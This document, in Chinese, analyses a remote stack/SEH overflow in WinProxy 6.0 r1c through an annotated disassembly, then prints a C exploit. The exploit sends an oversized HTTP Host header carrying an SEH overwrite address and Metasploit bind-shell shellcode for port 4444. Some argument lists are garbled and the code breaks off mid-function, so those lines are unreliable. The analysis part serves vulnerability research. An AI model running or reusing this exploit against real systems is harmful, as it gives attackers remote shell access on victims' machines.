winproxy 6.0 r1c stack/seh overflow 分析

[0] 难得经典的远程堆栈溢出,又很好利用,分析下记个笔记,有问题请联系我。

[1] 调用堆栈
WinProxy.0051F050
    |
    WinProxy.0051F4D0
        |
        WinProxy.00435E00
            |
            WinProxy.004360B0
                |
                WinProxy.00434200
                    |
                    WinProxy.005D9F80
                        |
                        WinProxy.005DE080

[2] 反汇编代码分析
----------------------造成溢出的调用------------------------
sub_5DE080      proc near               ; CODE XREF: sub_5D9F80+1ABFp
.text:005DE080                                         ; sub_5DD1A0+11Ep
.text:005DE080
.text:005DE080 ; sub_5DE080(arg_0, arg_4, arg_8) -- register-frame function, callee
.text:005DE080 ; cleans its arguments (retn 0Ch).  It copies the arg_4 buffer (arg_8
.text:005DE080 ; bytes) to the heap, builds "http://" + <string taken from a global>
.text:005DE080 ; in the stack buffer var_34, replaces every "http://Admin.WinProxy"
.text:005DE080 ; in the heap copy with that string, copies the result to a fresh
.text:005DE080 ; buffer and hands it to sub_42D0E0 (this = arg_0 + 2B8h).  Returns
.text:005DE080 ; sub_42D0E0's result in eax.
.text:005DE080 ;
.text:005DE080 ; Frame: push -1 / push handler / push fs:0 / mov fs:0,esp installs an
.text:005DE080 ; SEH registration record (handler loc_6613E8 at -8, previous record at
.text:005DE080 ; var_C), then sub esp,38h reserves the locals.  var_34 is therefore a
.text:005DE080 ; 28h-byte string buffer that starts 2Ch bytes below the handler slot.
.text:005DE080 ; The appends at 005DE163 and 005DE244 are inlined strcat idioms
.text:005DE080 ; (repne scasb / rep movsd / rep movsb) whose byte count comes from the
.text:005DE080 ; source string alone, so a string longer than the buffer overwrites
.text:005DE080 ; the SEH record, the return address and the arguments above it.
.text:005DE080 ; Fix: bound the append to the space left in var_34, or assemble the
.text:005DE080 ; string in a buffer sized from the source length (as var_44 already is).
.text:005DE080 ;
.text:005DE080 ; Register roles: ebx = arg_8 (later reused as a string length),
.text:005DE080 ; var_44 = heap copy, var_3C = saved arg_8, ebp = output buffer,
.text:005DE080 ; esi/edi = string-op pointers.  Helper semantics (sub_61F390 alloc,
.text:005DE080 ; sub_61F3D0 free, sub_4501B0/sub_450220/sub_450590 string-object
.text:005DE080 ; erase/insert/find) are inferred from usage, not from symbols -- confirm.
.text:005DE080
.text:005DE080 var_44          = dword ptr -44h        ; heap copy of arg_4 (pointer returned by sub_61F390)
.text:005DE080 var_40          = dword ptr -40h        ; size requested for that copy
.text:005DE080 var_3C          = dword ptr -3Ch        ; saved arg_8 (byte length)
.text:005DE080 var_38          = dword ptr -38h        ; constant 80h
.text:005DE080 var_34          = dword ptr -34h        ; string buffer "http://" + host; only 28h bytes up to var_C
.text:005DE080 var_C           = dword ptr -0Ch        ; saved fs:0 (previous SEH record); handler pointer lives at -8
.text:005DE080 var_4           = dword ptr -4          ; SEH try level
.text:005DE080 arg_0           = dword ptr  4          ; object pointer; arg_0 + 2B8h is passed as this to sub_42D0E0
.text:005DE080 arg_4           = dword ptr  8          ; source buffer, copied to var_44
.text:005DE080 arg_8           = dword ptr  0Ch        ; length of arg_4 in bytes
.text:005DE080
.text:005DE080                 push    0FFFFFFFFh      ; SEH frame: try level -1 (becomes var_4)
.text:005DE082                 push    offset loc_6613E8 ; SEH frame: handler pointer (slot at -8, just above var_C)
.text:005DE087                 mov     eax, large fs:0
.text:005DE08D                 push    eax             ; SEH frame: previous registration record (var_C)
.text:005DE08E                 mov     large fs:0, esp ; fs:0 now points at this frame's record
.text:005DE095                 sub     esp, 38h        ; only 38h (56) bytes of locals are reserved; precondition for the overflow
.text:005DE098                 push    ebx
.text:005DE099                 mov     ebx, [esp+48h+arg_8] ; ebx = arg_8 (length of the arg_4 buffer)
.text:005DE09D                 mov     eax, 80h
.text:005DE0A2                 push    ebp
.text:005DE0A3                 push    esi
.text:005DE0A4                 cmp     ebx, eax        ; signed compare of the length against 80h
.text:005DE0A6                 push    edi
.text:005DE0A7                 mov     [esp+54h+var_38], eax ; var_38 = 80h
.text:005DE0AB                 mov     [esp+54h+var_40], eax ; var_40 = 80h (default allocation size)
.text:005DE0AF                 jl      short loc_5DE0BB ; length < 80h: allocate 80h
.text:005DE0B1                 lea     eax, [ebx+80h]  ; otherwise allocate length + 80h
.text:005DE0B7                 mov     [esp+54h+var_40], eax
.text:005DE0BB
.text:005DE0BB loc_5DE0BB:                             ; CODE XREF: sub_5DE080+2Fj
.text:005DE0BB                 push    eax             ; size
.text:005DE0BC                 call    sub_61F390      ; presumably an allocator (size -> pointer in eax); confirm
.text:005DE0C1                 mov     edx, [esp+58h+arg_4] ; edx = arg_4 (source)
.text:005DE0C5                 mov     ecx, ebx        ; ecx = byte count
.text:005DE0C7                 mov     [esp+58h+var_44], eax ; var_44 = new buffer
.text:005DE0CB                 mov     edi, eax        ; edi = destination
.text:005DE0CD                 mov     eax, ecx        ; keep the count for the tail copy
.text:005DE0CF                 mov     esi, edx        ; esi = source
.text:005DE0D1                 shr     ecx, 2          ; dword count
.text:005DE0D4                 mov     [esp+58h+var_3C], ebx ; var_3C = length, reused at loc_5DE2C9
.text:005DE0D8                 rep movsd               ; inline memcpy(var_44, arg_4, arg_8): dwords ...
.text:005DE0DA                 mov     ecx, eax
.text:005DE0DC                 and     ecx, 3
.text:005DE0DF                 rep movsb               ; ... then the 0-3 remaining bytes
.text:005DE0E1                 mov     ecx, [esp+58h+var_44]
.text:005DE0E5                 mov     byte ptr [ecx+ebx], 0 ; NUL-terminate the copy (in bounds for a non-negative length)
.text:005DE0E9                 push    edx             ; edx still = arg_4 (rep movs does not touch edx)
.text:005DE0EA                 mov     [esp+5Ch+var_4], 0 ; enter SEH try level 0
.text:005DE0F2                 call    sub_61F3D0      ; presumably releases arg_4 (the same helper frees var_44 at the end); confirm
.text:005DE0F7                 lea     edx, [esp+5Ch+var_44]
.text:005DE0FB                 push    edx             ; &var_44
.text:005DE0FC                 call    sub_5DE360      ; sub_5DE360(&var_44); purpose not visible here
.text:005DE101                 mov     edi, offset aHttp_1 ; "http://"
.text:005DE106                 or      ecx, 0FFFFFFFFh ; inline strlen: ecx = -1, al = 0
.text:005DE109                 xor     eax, eax
.text:005DE10B                 add     esp, 0Ch        ; pop the three pushed arguments
.text:005DE10E                 repne scasb
.text:005DE110                 not     ecx             ; ecx = strlen("http://") + 1 = 8
.text:005DE112                 sub     edi, ecx        ; edi back to the start of the literal
.text:005DE114                 lea     edx, [esp+54h+var_34] ; edx = var_34 (the stack string buffer)
.text:005DE118                 mov     eax, ecx
.text:005DE11A                 mov     esi, edi
.text:005DE11C                 mov     edi, edx
.text:005DE11E                 shr     ecx, 2
.text:005DE121                 rep movsd               ; inline strcpy(var_34, "http://") -- 8 bytes, fits
.text:005DE123                 mov     ecx, eax
.text:005DE125                 mov     eax, dword_7227F4 ; global selecting which string gets appended
.text:005DE12A                 and     ecx, 3
.text:005DE12D                 test    eax, eax
.text:005DE12F                 rep movsb               ; movs leaves the flags from the test intact
.text:005DE131                 jz      loc_5DE1FD      ; dword_7227F4 == 0: use dword_7227D8 instead
.text:005DE137                 mov     ecx, dword_7227E8
.text:005DE13D                 xor     eax, eax
.text:005DE13F                 lea     edx, [esp+54h+var_34]
.text:005DE143                 lea     edi, [ecx+7E9Ch] ; edi = string at dword_7227E8 + 7E9Ch (origin not visible here)
.text:005DE149                 or      ecx, 0FFFFFFFFh
.text:005DE14C                 repne scasb             ; inline strlen of that string
.text:005DE14E                 not     ecx             ; ecx = its length + 1
.text:005DE150                 sub     edi, ecx
.text:005DE152                 mov     esi, edi        ; esi = source string
.text:005DE154                 mov     ebx, ecx        ; ebx = bytes to append incl. NUL; ebx no longer holds arg_8
.text:005DE156                 mov     edi, edx        ; edi = var_34
.text:005DE158                 or      ecx, 0FFFFFFFFh
.text:005DE15B                 repne scasb             ; find the NUL at the end of var_34
.text:005DE15D                 mov     ecx, ebx
.text:005DE15F                 dec     edi             ; edi = that NUL (append point)
.text:005DE160                 shr     ecx, 2
.text:005DE163                 rep movsd               ; inline strcat(var_34, src) -- no bound against the 28h-byte buffer
.text:005DE165                 mov     ecx, ebx
.text:005DE167                 mov     eax, offset aHttpAdmin_wi_4 ; "http://Admin.WinProxy"
.text:005DE16C                 and     ecx, 3
.text:005DE16F                 test    eax, eax
.text:005DE171                 rep movsb
.text:005DE173                 jz      loc_5DE2C9      ; never taken: eax holds a constant address (compiler artifact)
.text:005DE179                 lea     ecx, [esp+54h+var_34]
.text:005DE17D                 test    ecx, ecx
.text:005DE17F                 jz      loc_5DE2C9      ; never taken: ecx is a stack address
.text:005DE185                 mov     edi, eax
.text:005DE187                 or      ecx, 0FFFFFFFFh
.text:005DE18A                 xor     eax, eax
.text:005DE18C                 mov     edx, [esp+54h+var_44] ; edx = heap copy of arg_4
.text:005DE190                 repne scasb             ; inline strlen("http://Admin.WinProxy")
.text:005DE192                 not     ecx
.text:005DE194                 dec     ecx             ; ecx = length without NUL
.text:005DE195                 lea     edi, [esp+54h+var_34]
.text:005DE199                 mov     ebx, ecx        ; ebx = strlen("http://Admin.WinProxy")
.text:005DE19B                 or      ecx, 0FFFFFFFFh
.text:005DE19E                 repne scasb             ; inline strlen(var_34)
.text:005DE1A0                 not     ecx
.text:005DE1A2                 dec     ecx
.text:005DE1A3                 push    offset aHttpAdmin_wi_4 ; char *
.text:005DE1A8                 push    edx             ; char *
.text:005DE1A9                 mov     edi, ecx        ; edi = strlen(var_34)
.text:005DE1AB                 call    _strstr         ; strstr(var_44, "http://Admin.WinProxy")
.text:005DE1B0                 add     esp, 8
.text:005DE1B3                 test    eax, eax
.text:005DE1B5                 jz      loc_5DE2C9      ; not found: skip the rewrite
.text:005DE1BB                 sub     eax, [esp+54h+var_44] ; esi = offset of the match within var_44
.text:005DE1BF                 mov     esi, eax
.text:005DE1C1                 js      loc_5DE2C9
.text:005DE1C7
.text:005DE1C7 loc_5DE1C7:                             ; CODE XREF: sub_5DE080+176j
.text:005DE1C7                 push    ebx             ; count = strlen("http://Admin.WinProxy")
.text:005DE1C8                 push    esi             ; position
.text:005DE1C9                 lea     ecx, [esp+5Ch+var_44] ; this = &var_44 (looks like a string object; assumption)
.text:005DE1CD                 call    sub_4501B0      ; looks like erase(pos, count); confirm
.text:005DE1D2                 lea     eax, [esp+54h+var_34]
.text:005DE1D6                 lea     ecx, [esp+54h+var_44]
.text:005DE1DA                 push    eax             ; var_34
.text:005DE1DB                 push    esi             ; position
.text:005DE1DC                 call    sub_450220      ; looks like insert(pos, var_34); confirm
.text:005DE1E1                 add     esi, edi        ; advance past the inserted text
.text:005DE1E3                 lea     ecx, [esp+54h+var_44]
.text:005DE1E7                 push    esi
.text:005DE1E8                 push    offset aHttpAdmin_wi_4 ; "http://Admin.WinProxy"
.text:005DE1ED                 call    sub_450590      ; looks like find(str, pos) -> index, negative when absent; confirm
.text:005DE1F2                 mov     esi, eax
.text:005DE1F4                 test    esi, esi
.text:005DE1F6                 jge     short loc_5DE1C7 ; another occurrence: repeat
.text:005DE1F8                 jmp     loc_5DE2C9
.text:005DE1FD ; ---------------------------------------------------------------------------
.text:005DE1FD
.text:005DE1FD loc_5DE1FD:                             ; CODE XREF: sub_5DE080+B1j
.text:005DE1FD                 mov     eax, dword_7227E0
.text:005DE202                 test    eax, eax
.text:005DE204                 jz      loc_5DE2C9      ; nothing configured: skip the rewrite
.text:005DE20A                 jge     short loc_5DE21E
.text:005DE20C                 mov     ecx, 2          ; negative value: sub_412300(&dword_7227D8, 2 - value); meaning not visible here
.text:005DE211                 sub     ecx, eax
.text:005DE213                 push    ecx
.text:005DE214                 mov     ecx, offset dword_7227D8
.text:005DE219                 call    sub_412300
.text:005DE21E
.text:005DE21E loc_5DE21E:                             ; CODE XREF: sub_5DE080+18Aj
.text:005DE21E                 mov     edi, dword_7227D8 ; edi = host name string (global pointer)
.text:005DE224                 or      ecx, 0FFFFFFFFh
.text:005DE227                 xor     eax, eax
.text:005DE229                 lea     edx, [esp+54h+var_34]
.text:005DE22D                 repne scasb             ; inline strlen(host)
.text:005DE22F                 not     ecx
.text:005DE231                 sub     edi, ecx
.text:005DE233                 mov     esi, edi        ; esi = host name
.text:005DE235                 mov     ebx, ecx        ; ebx = strlen(host) + 1, taken from the string itself
.text:005DE237                 mov     edi, edx
.text:005DE239                 or      ecx, 0FFFFFFFFh
.text:005DE23C                 repne scasb             ; edi now points just past the terminator of var_34
.text:005DE23E                 mov     ecx, ebx
.text:005DE240                 dec     edi             ; back onto the NUL: append point
.text:005DE241                 shr     ecx, 2          ; 416 bytes in the author's test case
.text:005DE244                 rep movsd               ; appends the host name into var_34: this is the overflowing copy
.text:005DE246                 mov     ecx, ebx        ; bytes beyond 28h land on var_C, the handler at -8, the return address, arg_0 ...
.text:005DE248                 mov     eax, offset aHttpAdmin_wi_4 ; "http://Admin.WinProxy"
.text:005DE24D                 and     ecx, 3
.text:005DE250                 test    eax, eax
.text:005DE252                 rep movsb
.text:005DE254                 jz      short loc_5DE2C9 ; never taken (constant address), as at 005DE173
.text:005DE256                 lea     ecx, [esp+54h+var_34]
.text:005DE25A                 test    ecx, ecx
.text:005DE25C                 jz      short loc_5DE2C9 ; never taken
.text:005DE25E                 mov     edi, eax
.text:005DE260                 or      ecx, 0FFFFFFFFh
.text:005DE263                 xor     eax, eax
.text:005DE265                 mov     edx, [esp+54h+var_44]
.text:005DE269                 repne scasb             ; inline strlen("http://Admin.WinProxy")
.text:005DE26B                 not     ecx
.text:005DE26D                 dec     ecx
.text:005DE26E                 lea     edi, [esp+54h+var_34]
.text:005DE272                 mov     ebx, ecx
.text:005DE274                 or      ecx, 0FFFFFFFFh
.text:005DE277                 repne scasb             ; inline strlen(var_34)
.text:005DE279                 not     ecx
.text:005DE27B                 dec     ecx
.text:005DE27C                 push    offset aHttpAdmin_wi_4 ; char *
.text:005DE281                 push    edx             ; char *
.text:005DE282                 mov     edi, ecx        ; edi = strlen(var_34)
.text:005DE284                 call    _strstr         ; same search as at 005DE1AB
.text:005DE289                 add     esp, 8
.text:005DE28C                 test    eax, eax
.text:005DE28E                 jz      short loc_5DE2C9
.text:005DE290                 sub     eax, [esp+54h+var_44]
.text:005DE294                 mov     esi, eax
.text:005DE296                 js      short loc_5DE2C9
.text:005DE298
.text:005DE298 loc_5DE298:                             ; CODE XREF: sub_5DE080+247j
.text:005DE298                 push    ebx             ; replace loop, identical to loc_5DE1C7
.text:005DE299                 push    esi
.text:005DE29A                 lea     ecx, [esp+5Ch+var_44]
.text:005DE29E                 call    sub_4501B0
.text:005DE2A3                 lea     eax, [esp+54h+var_34]
.text:005DE2A7                 lea     ecx, [esp+54h+var_44]
.text:005DE2AB                 push    eax
.text:005DE2AC                 push    esi
.text:005DE2AD                 call    sub_450220
.text:005DE2B2                 add     esi, edi
.text:005DE2B4                 lea     ecx, [esp+54h+var_44]
.text:005DE2B8                 push    esi
.text:005DE2B9                 push    offset aHttpAdmin_wi_4 ; "http://Admin.WinProxy"
.text:005DE2BE                 call    sub_450590
.text:005DE2C3                 mov     esi, eax
.text:005DE2C5                 test    esi, esi
.text:005DE2C7                 jge     short loc_5DE298
.text:005DE2C9
.text:005DE2C9 loc_5DE2C9:                             ; CODE XREF: sub_5DE080+F3j
.text:005DE2C9                                         ; sub_5DE080+FFj ...
.text:005DE2C9                 mov     ebx, [esp+54h+var_3C] ; common continuation: ebx = saved arg_8
.text:005DE2CD                 lea     ecx, [ebx+1]
.text:005DE2D0                 push    ecx             ; length + 1
.text:005DE2D1                 call    sub_61F390      ; second allocation (see above)
.text:005DE2D6                 mov     ebp, eax        ; ebp = output buffer
.text:005DE2D8                 add     esp, 4
.text:005DE2DB                 mov     byte ptr [ebx+ebp], 0 ; NUL-terminate
.text:005DE2DF                 mov     eax, [esp+54h+var_3C]
.text:005DE2E3                 test    eax, eax
.text:005DE2E5                 jge     short loc_5DE2F8
.text:005DE2E7                 mov     edx, 2          ; negative length: sub_412300(&var_44, 2 - length); mirrors 005DE20C
.text:005DE2EC                 lea     ecx, [esp+54h+var_44]
.text:005DE2F0                 sub     edx, eax
.text:005DE2F2                 push    edx
.text:005DE2F3                 call    sub_412300
.text:005DE2F8
.text:005DE2F8 loc_5DE2F8:                             ; CODE XREF: sub_5DE080+265j
.text:005DE2F8                 mov     esi, [esp+54h+var_44] ; source = rewritten heap copy
.text:005DE2FC                 mov     ecx, ebx
.text:005DE2FE                 mov     eax, ecx
.text:005DE300                 mov     edi, ebp        ; destination = output buffer
.text:005DE302                 shr     ecx, 2
.text:005DE305                 rep movsd               ; inline memcpy(ebp, var_44, saved length)
.text:005DE307                 mov     ecx, eax
.text:005DE309                 push    0               ; sub_42D0E0 arg_14
.text:005DE30B                 and     ecx, 3
.text:005DE30E                 push    1               ; sub_42D0E0 arg_10
.text:005DE310                 rep movsb
.text:005DE312                 mov     ecx, [esp+5Ch+arg_0] ;
.text:005DE312                                         ; arg_0 is read back from the stack here; once the frame has been
.text:005DE312                                         ; overrun this slot is overwritten as well, which is what makes
.text:005DE312                                         ; the call below fault
.text:005DE316                 push    0               ; sub_42D0E0 arg_C
.text:005DE318                 push    0               ; sub_42D0E0 arg_8
.text:005DE31A                 push    ebx             ; sub_42D0E0 arg_4 = length
.text:005DE31B                 push    ebp             ; sub_42D0E0 arg_0 = output buffer
.text:005DE31C                 add     ecx, 2B8h       ; this = arg_0 + 2B8h
.text:005DE322                 call    sub_42D0E0      ; the call in which the exception is raised (listing below)
.text:005DE327                 mov     esi, eax        ; esi = its result, returned unchanged
.text:005DE329                 mov     eax, [esp+54h+var_44]
.text:005DE32D                 test    eax, eax
.text:005DE32F                 mov     [esp+54h+var_4], 0FFFFFFFFh ; leave the SEH try level
.text:005DE337                 jz      short loc_5DE342
.text:005DE339                 push    eax
.text:005DE33A                 call    sub_61F3D0      ; release var_44
.text:005DE33F                 add     esp, 4
.text:005DE342
.text:005DE342 loc_5DE342:                             ; CODE XREF: sub_5DE080+2B7j
.text:005DE342                 mov     ecx, [esp+54h+var_C] ; previous SEH record
.text:005DE346                 mov     eax, esi
.text:005DE348                 pop     edi
.text:005DE349                 pop     esi
.text:005DE34A                 pop     ebp
.text:005DE34B                 pop     ebx
.text:005DE34C                 mov     large fs:0, ecx ; unlink this frame's SEH record
.text:005DE353                 add     esp, 44h
.text:005DE356                 retn    0Ch             ; callee cleans the 3 dword arguments
.text:005DE356 sub_5DE080      endp


---------------------触发异常的子调用----------------------
.text:0042D0E0 sub_42D0E0      proc near               ; CODE XREF: sub_421AF0+34Fp
.text:0042D0E0                                         ; sub_421E90+94p ...
.text:0042D0E0
.text:0042D0E0 ; sub_42D0E0(this = ecx, arg_0..arg_14): allocates a 28h-byte record,
.text:0042D0E0 ; fills it from the arguments and from fields of *this (+14h, +18h,
.text:0042D0E0 ; +1Ch), passes it to sub_42DD40, then adds arg_4 to this+18h and
.text:0042D0E0 ; returns this+14h + this+18h.  Callee cleans 6 dword args (retn 18h).
.text:0042D0E0 ; sub_5DE080 calls it with ecx = arg_0 + 2B8h; when sub_5DE080's frame
.text:0042D0E0 ; has been overrun that ecx is overwritten data, and the first
.text:0042D0E0 ; dereference of esi below (0042D125) faults.  The fault is what
.text:0042D0E0 ; dispatches to the -- also overwritten -- SEH record on the stack.
.text:0042D0E0 ; Separate latent bug: if sub_61F390 returns 0, loc_42D114 sets eax = 0
.text:0042D0E0 ; and the stores from loc_42D116 on go through a null base.
.text:0042D0E0
.text:0042D0E0 arg_0           = dword ptr  0Ch        ; offsets include the two saved regs + return address
.text:0042D0E0 arg_4           = dword ptr  10h        ; added to this+18h at the end
.text:0042D0E0 arg_8           = dword ptr  14h        ; 0 or -1 selects a value read from *this
.text:0042D0E0 arg_C           = dword ptr  18h        ; 0 -> record+4 = 3, else record+4 = 0
.text:0042D0E0 arg_10          = dword ptr  1Ch        ; stored at record+18h
.text:0042D0E0 arg_14          = dword ptr  20h        ; stored at record+24h
.text:0042D0E0
.text:0042D0E0                 push    esi
.text:0042D0E1                 push    edi
.text:0042D0E2                 mov     esi, ecx        ; esi = this; a corrupted ecx makes the [esi+...] loads below fault
.text:0042D0E4                 push    28h
.text:0042D0E6                 call    sub_61F390      ; allocate a 28h-byte record (same helper as in sub_5DE080)
.text:0042D0EB                 xor     edx, edx        ; edx = 0 for the rest of the function
.text:0042D0ED                 add     esp, 4
.text:0042D0F0                 cmp     eax, edx
.text:0042D0F2                 jz      short loc_42D114 ; allocation failed
.text:0042D0F4                 mov     [eax], edx      ; zero-fill the record, except +18h = 1
.text:0042D0F6                 mov     [eax+8], edx
.text:0042D0F9                 mov     [eax+0Ch], edx
.text:0042D0FC                 mov     [eax+10h], edx
.text:0042D0FF                 mov     [eax+14h], edx
.text:0042D102                 mov     dword ptr [eax+18h], 1
.text:0042D109                 mov     [eax+1Ch], edx
.text:0042D10C                 mov     [eax+20h], edx
.text:0042D10F                 mov     [eax+24h], edx
.text:0042D112                 jmp     short loc_42D116
.text:0042D114 ; ---------------------------------------------------------------------------
.text:0042D114
.text:0042D114 loc_42D114:                             ; CODE XREF: sub_42D0E0+12j
.text:0042D114                 xor     eax, eax        ; NOTE(review): eax = 0 falls straight into the stores at loc_42D116
.text:0042D116
.text:0042D116 loc_42D116:                             ; CODE XREF: sub_42D0E0+32j
.text:0042D116                 mov     ecx, [esp+arg_10]
.text:0042D11A                 mov     [eax+18h], ecx  ; record+18h = arg_10
.text:0042D11D                 mov     ecx, [esp+arg_8]
.text:0042D121                 cmp     ecx, edx
.text:0042D123                 jnz     short loc_42D12A
.text:0042D125                 mov     ecx, [esi+1Ch]  ; arg_8 == 0 (the case sub_5DE080 uses): ecx = this+1Ch.  After the
.text:0042D125                                         ; stack overrun esi holds overwritten data and this load faults; because
.text:0042D125                                         ; the SEH registration record on the stack was overwritten as well, the
.text:0042D125                                         ; exception is dispatched to it -- the author's point that the bug is
.text:0042D125                                         ; straightforward to exploit
.text:0042D128                 jmp     short loc_42D137
.text:0042D12A ; ---------------------------------------------------------------------------
.text:0042D12A
.text:0042D12A loc_42D12A:                             ; CODE XREF: sub_42D0E0+43j
.text:0042D12A                 cmp     ecx, 0FFFFFFFFh
.text:0042D12D                 jnz     short loc_42D137 ; any other arg_8 value is used as-is
.text:0042D12F                 mov     ecx, [esi+1Ch]  ; arg_8 == -1: ecx = this+1Ch + this+14h
.text:0042D132                 mov     edi, [esi+14h]
.text:0042D135                 add     ecx, edi
.text:0042D137
.text:0042D137 loc_42D137:                             ; CODE XREF: sub_42D0E0+48j
.text:0042D137                                         ; sub_42D0E0+4Dj
.text:0042D137                 mov     edi, [esp+arg_C]
.text:0042D13B                 mov     [eax], edx      ; record+0 = 0
.text:0042D13D                 cmp     edi, edx
.text:0042D13F                 jz      short loc_42D146
.text:0042D141                 mov     [eax+4], edx    ; arg_C != 0: record+4 = 0
.text:0042D144                 jmp     short loc_42D14D
.text:0042D146 ; ---------------------------------------------------------------------------
.text:0042D146
.text:0042D146 loc_42D146:                             ; CODE XREF: sub_42D0E0+5Fj
.text:0042D146                 mov     dword ptr [eax+4], 3 ; arg_C == 0: record+4 = 3
.text:0042D14D
.text:0042D14D loc_42D14D:                             ; CODE XREF: sub_42D0E0+64j
.text:0042D14D                 mov     edx, [esp+arg_0]
.text:0042D151                 mov     edi, [esp+arg_4]
.text:0042D155                 mov     [eax+8], ecx    ; record+8 = value chosen from arg_8
.text:0042D158                 mov     ecx, [esp+arg_14]
.text:0042D15C                 mov     [eax+24h], ecx  ; record+24h = arg_14
.text:0042D15F                 push    eax             ; record
.text:0042D160                 mov     ecx, esi        ; this
.text:0042D162                 mov     [eax+0Ch], edx  ; record+0Ch = arg_0
.text:0042D165                 mov     [eax+10h], edi  ; record+10h = arg_4
.text:0042D168                 call    sub_42DD40      ; sub_42DD40(this, record); appears to pop its own argument (no esp fix-up after it)
.text:0042D16D                 mov     eax, [esi+18h]
.text:0042D170                 add     eax, edi        ; this+18h += arg_4 (edi still = arg_4 here)
.text:0042D172                 pop     edi
.text:0042D173                 mov     [esi+18h], eax
.text:0042D176                 mov     ecx, eax
.text:0042D178                 mov     eax, [esi+14h]
.text:0042D17B                 pop     esi
.text:0042D17C                 add     eax, ecx        ; return this+14h + updated this+18h
.text:0042D17E                 retn    18h             ; callee cleans the 6 dword arguments
.text:0042D17E sub_42D0E0      endp

[3] 溢出利用程序

/*
** 
** winproxy 6.0 r1c remote stack/seh overflow exploit
**
** luoluonet@hotmail.com
**
** description: 
http://www.idefense.com/intelligence/vulnerabilities/display.php?id=365 
**
** reference: 
http://www.milw0rm.com/id.php?id=1408
**
*/
#include 
<stdio.h>
#include 
<winsock2.h>

#pragma comment(lib, 
"ws2_32.lib")

#define BUFFER_SIZE 1024

void SendBuffer(char *szHost, int nPort, char *szBuffer, int nLen);

char szFormat[] = "GET / HTTP/1.0\r\nHost: localhost%s\r\n\r\n";

//
// pavinet.dll内的 pop ra pop rb ret 指令序列,具体的操作系统可以用ollydbg查找之
//
unsigned char seh[] = "\xf0\xea\x3f\x01";    // xp sp2
//unsigned char seh[] = "\xf0\xea\x78\x01";    // 2k sp4

unsigned 
char jmp[] = "\x90\x90\xeb\x10";

// shellcode from metasploit.org, bind cmd shell on port 4444
unsigned char sc[]    = "\x31\xc9\x83\xe9\xb0\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x26"
        
"\x8c\x6d\xa3\x83\xeb\xfc\xe2\xf4\xda\xe6\x86\xee\xce\x75\x92\x5c"
        
"\xd9\xec\xe6\xcf\x02\xa8\xe6\xe6\x1a\x07\x11\xa6\x5e\x8d\x82\x28"
        
"\x69\x94\xe6\xfc\x06\x8d\x86\xea\xad\xb8\xe6\xa2\xc8\xbd\xad\x3a"
        
"\x8a\x08\xad\xd7\x21\x4d\xa7\xae\x27\x4e\x86\x57\x1d\xd8\x49\x8b"
        
"\x53\x69\xe6\xfc\x02\x8d\x86\xc5\xad\x80\x26\x28\x79\x90\x6c\x48"
        
"\x25\xa0\xe6\x2a\x4a\xa8\x71\xc2\xe5\xbd\xb6\xc7\xad\xcf\x5d\x28"
        
"\x66\x80\xe6\xd3\x3a\x21\xe6\xe3\x2e\xd2\x05\x2d\x68\x82\x81\xf3"
        
"\xd9\x5a\x0b\xf0\x40\xe4\x5e\x91\x4e\xfb\x1e\x91\x79\xd8\x92\x73"
        
"\x4e\x47\x80\x5f\x1d\xdc\x92\x75\x79\x05\x88\xc5\xa7\x61\x65\xa1"
        
"\x73\xe6\x6f\x5c\xf6\xe4\xb4\xaa\xd3\x21\x3a\x5c\xf0\xdf\x3e\xf0"
        
"\x75\xdf\x2e\xf0\x65\xdf\x92\x73\x40\xe4\x7c\xff\x40\xdf\xe4\x42"
        
"\xb3\xe4\xc9\xb9\x56\x4b\x3a\x5c\xf0\xe6\x7d\xf2\x73\x73\xbd\xcb"
        
"\x82\x21\x43\x4a\x71\x73\xbb\xf0\x73\x73\xbd\xcb\xc3\xc5\xeb\xea"
        
"\x71\x73\xbb\xf3\x72\xd8\x38\x5c\xf6\x1f\x05\x44\x5f\x4a\x14\xf4"
        
"\xd9\x5a\x38\x5c\xf6\xea\x07\xc7\x40\xe4\x0e\xce\xaf\x69\x07\xf3"
        
"\x7f\xa5\xa1\x2a\xc1\xe6\x29\x2a\xc4\xbd\xad\x50\x8c\x72\x2f\x8e"
        
"\xd8\xce\x41\x30\xab\xf6\x55\x08\x8d\x27\x05\xd1\xd8\x3f\x7b\x5c"
        
"\x53\xc8\x92\x75\x7d\xdb\x3f\xf2\x77\xdd\x07\xa2\x77\xdd\x38\xf2"
        
"\xd9\x5c\x05\x0e\xff\x89\xa3\xf0\xd9\x5a\x07\x5c\xd9\xbb\x92\x73"
        
"\xad\xdb\x91\x20\xe2\xe8\x92\x75\x74\x73\xbd\xcb\x58\x54\x8f\xd0"
        
"\x75\x73\xbb\x5c\xf6\x8c\x6d\xa3";

void main(int argc, char *argv[])
{
    /* Entry point: takes <host> <port>, fills szPadding, formats it into the
     * request template szFormat and hands the result to SendBuffer().
     * Line structure below is restored from a whitespace-mangled paste; the
     * tokens are kept exactly as they appear on the page. */
    char szBuffer[BUFFER_SIZE] = {0};
    char szPadding[BUFFER_SIZE] = {0};

    if (argc != 3)
    {
        printf("usage:\n  winproxy <host> <port>\n");
        return;
    }

    /* argv[1] is only length-checked; SendBuffer() passes it to inet_addr(). */
    if (strlen(argv[1]) > 32)
    {
        printf("error: too long hostname\n");
        return;
    }

    /* NOTE(review): the two memset() argument lists are garbled in this
     * paste and are reproduced verbatim. */
    memset(szPadding, 0x9024);
    memcpy(szPadding + 24, jmp, 4);
    memcpy(szPadding + 24 + 4, seh, 4);
    memset(szPadding + 24 + 4 + 40x9032);
    memcpy(szPadding + 24 + 4 + 4 + 32, sc, sizeof(sc));

    /* sprintf() into a BUFFER_SIZE buffer with no length check on the result. */
    sprintf(szBuffer, szFormat, szPadding);

    SendBuffer(argv[1], atoi(argv[2]), szBuffer, sizeof(szBuffer));
}

void SendBuffer(char *szHost, int nPort, char *szBuffer, int nLen)
{
    /* Opens one TCP connection to szHost:nPort, sends nLen bytes of szBuffer
     * with a single send() call and closes the socket.  Errors are reported
     * on stdout; no value is returned.  Line structure is restored from a
     * whitespace-mangled paste; tokens are kept as they appear on the page. */
    WSADATA WSAData;
    SOCKET s;
    SOCKADDR_IN addr_in;
    int nBytesSend = 0;

    /* NOTE(review): the MAKEWORD() argument is garbled in this paste and is
     * reproduced verbatim. */
    if (WSAStartup(MAKEWORD(20), &WSAData) != 0)
    {
        printf("error: failed WSAStartup\n");
        return;
    }

    /* Returns without WSACleanup() on this path (the later paths go through _exit). */
    if ((s = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) == INVALID_SOCKET)
    {
        printf("error: failed socket\n");
        return;
    }

